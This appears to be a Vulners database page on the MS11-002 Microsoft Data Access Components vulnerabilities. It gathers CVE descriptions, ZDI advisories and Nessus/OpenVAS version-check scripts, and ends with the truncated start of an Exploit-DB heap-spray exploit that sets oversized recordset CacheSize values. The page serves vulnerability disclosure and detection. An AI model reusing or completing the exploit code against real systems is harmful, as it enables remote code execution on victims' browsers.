Search...

Microsoft ADO security vulnerabilities

2011-01-12T00:00:00

ID SECURITYVULNS:VULN:11348
Type securityvulns
Reporter MICROSOFT
Modified 2011-01-12T00:00:00

Description

Buffer overflow, memory corruption.

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:VULN:11348", "bulletinFamily": "software", "title": "Microsoft ADO security vulnerabilities", "description": "Buffer overflow, memory corruption.", "published": "2011-01-12T00:00:00", "modified": "2011-01-12T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11348", "reporter": "MICROSOFT", "references": [], "cvelist": ["CVE-2011-0026", "CVE-2011-0027"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:40", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "c49830d513628fd8d8ecd3275155ae4a"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "790e78b7c3ea27281d39ece3e72db563"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "bf006f97b9e84f8bcff795ebe3079764"}, {"key": "href", "hash": "368f4e1f90f76b3355457cf475bd4f22"}, {"key": "modified", "hash": "0e81155ef2a5bb0e15d3365024426ad4"}, {"key": "published", "hash": "0e81155ef2a5bb0e15d3365024426ad4"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "6ef686b32faf3c870b16770ecf4de086"}, {"key": "title", "hash": "3af332f29eaf2fda12d0f781db5ee8fe"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "de640724c08ec865375a4acee88287fc722f1749120c896609e31c939f40969f", "viewCount": 1, "enchantments": {"score": {"value": 10.0, "vector": "NONE", "modified": "2018-08-31T11:09:40"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-0026", "CVE-2011-0027"]}, {"type": "nessus", "idList": ["SMB_NT_MS11-002.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:902281", "OPENVAS:1361412562310902281"]}, {"type": "zdi", "idList": ["ZDI-11-001", "ZDI-11-002", "ZDI-12-158"]}, {"type": "exploitdb", "idList": ["EDB-ID:15984"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28402"]}], "modified": "2018-08-31T11:09:40"}, "vulnersScore": 10.0}, "objectVersion": "1.3", "affectedSoftware": [{"name": "Windows", "operator": "eq", "version": "7"}]}

{"cve": [{"lastseen": "2018-11-01T05:13:12", "bulletinFamily": "NVD", "description": "Integer signedness error in the SQLConnectW function in an ODBC API (odbc32.dll) in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, allows remote attackers to execute arbitrary code via a long string in the Data Source Name (DSN) and a crafted szDSN argument, which bypasses a signed comparison and leads to a buffer overflow, aka \"DSN Overflow Vulnerability.\"", "modified": "2018-10-30T12:27:21", "published": "2011-01-11T20:00:01", "id": "CVE-2011-0026", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0026", "title": "CVE-2011-0026", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-01T05:13:12", "bulletinFamily": "NVD", "description": "Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, does not properly validate memory allocation for internal data structures, which allows remote attackers to execute arbitrary code, possibly via a large CacheSize property that triggers an integer wrap and a buffer overflow, aka \"ADO Record Memory Vulnerability.\" NOTE: this might be a duplicate of CVE-2010-1117 or CVE-2010-1118.", "modified": "2018-10-30T12:27:21", "published": "2011-01-11T20:00:01", "id": "CVE-2011-0027", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0027", "title": "CVE-2011-0027", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:11:35", "bulletinFamily": "scanner", "description": "The version of Microsoft Data Access Components (MDAC) installed on\nthe remote Windows host is affected by two vulnerabilities, which\ncould allow arbitrary code execution if a user views a specially\ncrafted web page:\n\n - A buffer overflow in the Open Database Connectivity\n (ODBC) API used by third-party applications can be\n triggered by an overly long Data Source Name (DSN)\n argument. (CVE-2011-0026)\n\n - A failure of MDAC to correctly allocate memory when\n handling internal data structures in ActiveX Data\n Objects (ADO) records can be abused to execute\n arbitrary code. (CVE-2011-0027)", "modified": "2018-11-15T00:00:00", "published": "2011-01-11T00:00:00", "id": "SMB_NT_MS11-002.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51455", "title": "MS11-002: Vulnerabilities in Microsoft Data Access Components Could Allow Remote Code Execution (2451910)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51455);\n script_version(\"1.26\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2011-0026\", \"CVE-2011-0027\");\n script_bugtraq_id(45695, 45698);\n script_xref(name:\"EDB-ID\", value:\"15984\");\n script_xref(name:\"IAVA\", value:\"2011-A-0004\");\n script_xref(name:\"MSFT\", value:\"MS11-002\");\n script_xref(name:\"MSKB\", value:\"2419640\");\n\n script_name(english:\"MS11-002: Vulnerabilities in Microsoft Data Access Components Could Allow Remote Code Execution (2451910)\");\n script_summary(english:\"Checks the version of Msado15.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nData Access Components.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Data Access Components (MDAC) installed on\nthe remote Windows host is affected by two vulnerabilities, which\ncould allow arbitrary code execution if a user views a specially\ncrafted web page:\n\n - A buffer overflow in the Open Database Connectivity\n (ODBC) API used by third-party applications can be\n triggered by an overly long Data Source Name (DSN)\n argument. (CVE-2011-0026)\n\n - A failure of MDAC to correctly allocate memory when\n handling internal data structures in ActiveX Data\n Objects (ADO) records can be abused to execute\n arbitrary code. (CVE-2011-0027)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-001/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-002/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows XP, 2003, Vista,\n2008, 7, and 2008 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS11-002';\nkbs = make_list(\"2419640\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'1,2', win7:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nado_path = hotfix_get_commonfilesdir();\nif (!ado_path) audit(AUDIT_PATH_NOT_DETERMINED, 'Common Files');\nado_path += \"\\system\\ado\";\n\nshare = hotfix_path2share(path:ado_path);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / Server 2008 R2\n # - KB 2419640\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Msado15.dll\", version:\"6.1.7600.20818\", min_version:\"6.1.7600.20000\", path:ado_path, bulletin:bulletin, kb:\"2419640\") ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Msado15.dll\", version:\"6.1.7600.16688\", min_version:\"6.1.0.0\", path:ado_path, bulletin:bulletin, kb:\"2419640\") ||\n\n # Vista / Windows Server 2008\n # - KB 2419640\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Msado15.dll\", version:\"6.0.6002.22555\", min_version:\"6.0.6002.22000\", path:ado_path, bulletin:bulletin, kb:\"2419640\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Msado15.dll\", version:\"6.0.6002.18362\", min_version:\"6.0.0.0\", path:ado_path, bulletin:bulletin, kb:\"2419640\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Msado15.dll\", version:\"6.0.6001.22821\", min_version:\"6.0.6001.22000\", path:ado_path, bulletin:bulletin, kb:\"2419640\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Msado15.dll\", version:\"6.0.6001.18570\", min_version:\"6.0.0.0\", path:ado_path, bulletin:bulletin, kb:\"2419640\") ||\n\n # Windows 2003 and XP x64\n # - KB 2419635\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Msado15.dll\", version:\"2.82.4795.0\", path:ado_path, bulletin:bulletin, kb:\"2419635\") ||\n\n # Windows XP\n # - KB 2419632\n hotfix_is_vulnerable(os:\"5.1\", sp:3, arch:\"x86\", file:\"Msado15.dll\", version:\"2.81.3012.0\", path:ado_path, bulletin:bulletin, kb:\"2419632\")\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-02-09T11:14:43", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS11-002.", "modified": "2018-02-08T00:00:00", "published": "2011-01-12T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=902281", "id": "OPENVAS:902281", "title": "Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms11-002.nasl 8724 2018-02-08 15:02:56Z cfischer $\n#\n# Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow the attacker to execute arbitrary code on\n the targeted system.\n\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Windows 7\n\n Microsoft Windows XP Service Pack 3 and prior.\n\n Microsoft Windows 2K3 Service Pack 2 and prior.\n\n Microsoft Windows Vista Service Pack 2 and prior.\n\n Microsoft Windows Server 2008 Service Pack 2 and prior.\";\ntag_insight = \"The flaws are due to:\n\n - A buffer overflow error in the Data Source Name (DSN) argument of an Open\n Database Connectivity (ODBC) API that may be used by third-party applications,\n which could allow attackers to execute arbitrary code by convincing a user to\n visit a specially crafted web page.\n\n - A memory corruption error in the Microsoft Data Access Components (MDAC) when\n handling internal data structures, which could be exploited by remote attackers\n to execute arbitrary code via a specially crafted web page.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n\n http://www.microsoft.com/technet/security/Bulletin/MS11-002.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS11-002.\";\n\nif(description)\n{\n script_id(902281);\n script_version(\"$Revision: 8724 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-08 16:02:56 +0100 (Thu, 08 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-12 13:59:47 +0100 (Wed, 12 Jan 2011)\");\n script_cve_id(\"CVE-2011-0026\", \"CVE-2011-0027\");\n script_bugtraq_id(45698, 45695);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2419632\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2419635\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2419640\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2011/0075\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:1) <= 0){\n exit(0);\n}\n\n## MS11-002 Hotfix 2419635 2419640 2419632\nif((hotfix_missing(name:\"2419635\") == 0) || (hotfix_missing(name:\"2419640\") == 0) ||\n (hotfix_missing(name:\"2419632\") == 0)){\n exit(0);\n}\n\n## Get Program Files Dir Path and construct complete path\nsysPath =registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\\",\n item:\"ProgramFilesDir\");\nif(!sysPath ){\n exit(0);\n}\n\ndllPath = sysPath + \"\\Common Files\\System\\msadc\";\nshare = ereg_replace(pattern:\"([a-zA-Z]):.*\", replace:\"\\1$\", string:dllPath);\nfile = ereg_replace(pattern:\"[a-zA-Z]:(.*)\", replace:\"\\1\",\n string:dllPath + \"\\Msadco.dll\");\n\n## Get Version from Msadco.dll file\ndllVer = GetVer(file:file, share:share);\nif(!dllVer){\n exit(0);\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n ## Check for Msadco.dll version\n if(version_is_less(version:dllVer, test_version:\"2.81.3012.0\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n ## Check for Msadco.dll version\n if(version_is_less(version:dllVer, test_version:\"2.82.4795.0\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n\n if(!SP) {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n ## Check for Msadco.dll version\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18570\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n ## Check for Msadco.dll version\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18362\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n ## Check for Msadco.dll version\n if(version_is_less(version:dllVer, test_version:\"6.1.7600.16688\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:44:51", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS11-002.", "modified": "2018-10-20T00:00:00", "published": "2011-01-12T00:00:00", "id": "OPENVAS:1361412562310902281", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902281", "title": "Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms11-002.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902281\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-12 13:59:47 +0100 (Wed, 12 Jan 2011)\");\n script_cve_id(\"CVE-2011-0026\", \"CVE-2011-0027\");\n script_bugtraq_id(45698, 45695);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow the attacker to execute arbitrary code on\n the targeted system.\");\n script_tag(name:\"affected\", value:\"Microsoft Windows 7\n\n Microsoft Windows XP Service Pack 3 and prior.\n\n Microsoft Windows 2K3 Service Pack 2 and prior.\n\n Microsoft Windows Vista Service Pack 2 and prior.\n\n Microsoft Windows Server 2008 Service Pack 2 and prior.\");\n script_tag(name:\"insight\", value:\"The flaws are due to:\n\n - A buffer overflow error in the Data Source Name (DSN) argument of an Open\n Database Connectivity (ODBC) API that may be used by third-party applications,\n which could allow attackers to execute arbitrary code by convincing a user to\n visit a specially crafted web page.\n\n - A memory corruption error in the Microsoft Data Access Components (MDAC) when\n handling internal data structures, which could be exploited by remote attackers\n to execute arbitrary code via a specially crafted web page.\");\n script_tag(name:\"solution\", value:\"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS11-002.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2419632\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2419635\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2419640\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2011/0075\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/Bulletin/MS11-002.mspx\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:1) <= 0){\n exit(0);\n}\n\n## MS11-002 Hotfix 2419635 2419640 2419632\nif((hotfix_missing(name:\"2419635\") == 0) || (hotfix_missing(name:\"2419640\") == 0) ||\n (hotfix_missing(name:\"2419632\") == 0)){\n exit(0);\n}\n\nsysPath =registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\\",\n item:\"ProgramFilesDir\");\nif(!sysPath ){\n exit(0);\n}\n\ndllPath = sysPath + \"\\Common Files\\System\\msadc\";\nshare = ereg_replace(pattern:\"([a-zA-Z]):.*\", replace:\"\\1$\", string:dllPath);\nfile = ereg_replace(pattern:\"[a-zA-Z]:(.*)\", replace:\"\\1\",\n string:dllPath + \"\\Msadco.dll\");\n\ndllVer = GetVer(file:file, share:share);\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"2.81.3012.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"2.82.4795.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n\n if(!SP) {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18570\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18362\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.1.7600.16688\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:17:58", "bulletinFamily": "info", "description": "This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Microsoft Data Access Components. The vulnerability is present in an API call and as such successful exploitation will depend on an application's implementation of this call.\n\nThe specific flaw exists within the SQLConnectW call in the odbc32.dll component. When calculating the size of a user provided szDSN, the result of a call to lstrlenW is used in a signed comparison to SQL_MAX_DSN_LENGTH to verify the destination buffer size. This value is later used to copy user supplied data to a fixed length stack buffer. A malicious szDSN length could be used to exploit this signedness bug and execute arbitrary code.", "modified": "2011-11-09T00:00:00", "published": "2011-01-11T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-001", "id": "ZDI-11-001", "title": "Microsoft Data Access Components DSN Overflow Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:05", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. This vulnerability was submitted to the ZDI via at the annual Pwn2Own competition at CanSecWest. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe flaw exists within the MSADO component. When handling the a user specified CacheSize property the process uses this value to calculate the 'real' cache size. This value is used without proper validation. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the browser.", "modified": "2011-11-09T00:00:00", "published": "2011-01-11T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-002", "id": "ZDI-11-002", "title": "Microsoft Internet Explorer MSADO CacheSize Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:00", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the MSADO component. When handling the a user specified CacheSize property the process uses this value to calculate the 'real' cache size. This value is used without proper validation. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the browser. This bug is a failed fix for CVE-2011-0027 / http://www.zerodayinitiative.com/advisories/ZDI-11-002/", "modified": "2012-11-09T00:00:00", "published": "2012-08-22T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-12-158", "id": "ZDI-12-158", "title": "Microsoft Internet Explorer MSADO CacheSize Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T22:52:30", "bulletinFamily": "exploit", "description": "Microsoft Data Access Components Vulnerability (MS11-002). CVE-2011-0027. Remote exploit for windows platform", "modified": "2011-01-12T00:00:00", "published": "2011-01-12T00:00:00", "id": "EDB-ID:15984", "href": "https://www.exploit-db.com/exploits/15984/", "type": "exploitdb", "title": "Microsoft Data Access Components Vulnerability MS11-002", "sourceData": "<html xmlns:t = \"urn:schemas-microsoft-com:time\">\r\n <head>\r\n <meta name=\"License\" content=\"Q Public License;http://en.wikipedia.org/wiki/Q_Public_License\">\r\n <style>\r\n .body {\r\n \r\n }\r\n #test {\r\n \r\n }\r\n </style>\r\n <script src=\"heapLib.js\"></script>\r\n <script>\r\n // This code has been released under the Q Public License by Trolltech\r\n // http://en.wikipedia.org/wiki/Q_Public_License\r\n // Source: http://vreugdenhilresearch.nl/ms11-002-pwn2own-heap-overflow/\r\n\r\n\r\nvar StartTime = new Date(); \r\nvar FinalHeapSpraySize = 900;\r\n//var SmallHoleSize = 0x1F0;\r\nvar SmallHoleSize = 0x240;\r\nvar GlobalRowCounter = 0;\r\n \r\nvar localxmlid1;\r\nvar localxmlid2; \r\nvar localxmlid3; \r\nvar localxmlid5; \r\nvar adobase = 0;\r\nvar finalspray = '';\r\nvar heap = null;\r\nvar ExpoitTime = 10;\r\nvar CurrentHeapSpraySize = 0;\r\n\r\n\r\nfunction Start() {\r\n\tFaseOne();\r\n}\r\n\r\n\r\n\r\nfunction FaseOne() {\r\n\r\n localxmlid1 = document.getElementById('xmlid1').recordset; \r\n localxmlid2 = document.getElementById('xmlid2').recordset; \r\n localxmlid3 = document.getElementById('xmlid3').recordset; \r\n localxmlid5 = document.getElementById('xmlid5').recordset; \r\n \r\n localxmlid2.CacheSize = 0x40000358;\r\n \r\n localxmlid1.CacheSize = SmallHoleSize;; //small hole?\r\n 